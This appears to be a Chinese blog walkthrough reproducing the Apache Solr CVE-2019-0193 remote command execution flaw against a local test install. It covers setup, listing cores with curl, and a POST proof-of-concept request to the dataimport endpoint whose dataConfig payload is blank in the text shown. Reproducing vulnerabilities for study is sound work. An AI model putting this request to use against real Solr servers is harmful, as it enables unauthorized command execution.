CVE-2019-0193:Apache Solr 远程命令执行漏洞复现

本文学习参考连接:https://www.cnblogs.com/paperpen/p/11328728.html

背景:
2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重
范围:Apache Solr < 8.2.0
环境:https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip
本地解压后进入solr-7.7.2目录,前提是要有JAVA环境,
执行命令.\bin\solr.cmd -e dih
CVE-2019-0193:Apache Solr 远程命令执行漏洞复现_第1张图片
CVE-2019-0193:Apache Solr 远程命令执行漏洞复现_第2张图片
接下来利用漏洞,通过接口 curl http://127.0.0.1:8983/solr/admin/cores 来获取所有 core 信息,下面我们构造 payload 需要 name 信息
CVE-2019-0193:Apache Solr 远程命令执行漏洞复现_第3张图片
图中可以看出name值为atom
在Burp中发送以下POC即可执行命令弹出计算器,下面的 需要替换为你获取到的 core 的 name(共两处)

POST /solr//dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=&name=dataimport&dataConfig=







CVE-2019-0193:Apache Solr 远程命令执行漏洞复现_第4张图片
CVE-2019-0193:Apache Solr 远程命令执行漏洞复现_第5张图片

你可能感兴趣的:(漏洞复现)